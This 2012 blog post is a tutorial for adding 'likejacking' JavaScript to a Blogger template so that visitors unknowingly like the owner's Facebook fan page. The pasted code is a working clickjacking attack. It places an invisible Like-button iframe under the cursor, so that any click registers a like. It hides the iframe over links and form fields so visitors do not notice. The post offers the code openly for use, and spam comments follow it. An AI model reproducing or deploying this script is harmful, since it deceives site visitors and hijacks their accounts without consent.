Thursday 4 October 2012

Automatically Increase Facebook Likes Using Javascript

,
Well I've Found This Simple Script that i've Found  on Internet.to be Applied on Your Blogs and Sites So That You may Gain some More Unique Likes for your Facebook Fan Page.any unique visitor who comes to your page can become your fan. He just Has to click anywhere on the webpage and a small invisible like button will follow their mouse cursor and as soon they clicks anywhere on your blog he will be liking your fan page. So Follow the Below Steps To apply it to your Blog.




How to Add this Java script to Your Blog.


  • Login To Blogger Account.
  • Go To Your→ Template → Edit HTML.
  • Click Proceed Button.
  • Check The Expand Widget Templates.
  • Search Following Code Using Ctrl+F.
</head>

 
Now Paste The Below Code Above </Head> Tag.

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
    </script>
    <script type='text/javascript'>
             function ClickJackFbHide(){
                jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
             }
             function ClickJackFbShow(){
                jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
             }
     
    </script>

Now Again Search for the Below Code

Search Following Code Using </Body>.Tag.
Now Paste The Below Code Above It.

<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Here&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>


Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and Go back to your Blog to test it.


Now as soon as you refresh your blog you will see cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and as soon as they will click it they will become your page fan.

Notice: Use this at Your Own Risk...

  • There Are Some Issues You Might Face Using This Script In Your Website Or Blog.
  • The First Thing Is That When People Drag They Might Not Able To Select The Text As They Will See A Semi Visible Like Button Which Will Be Attached To Your Mouse Cursor As It Moves.
  • The Second One Is Some Other Gadgets Might Get Affected And Act Weirdly, Try Using It If Everything Works Ok Then Start Increasing Your Fans.
That's It . Now You're Done

5 comments:

  1. Nice post!!!
    Regards,
    http://www.aktechz.com

    ReplyDelete
  2. thanks for the script ......
    and try to post a autoadder script

    ReplyDelete
  3. Ever wanted to get free Facebook Likes?
    Did you know that you can get these AUTOMATICALLY AND ABSOLUTELY FREE by registering on Add Me Fast?

    ReplyDelete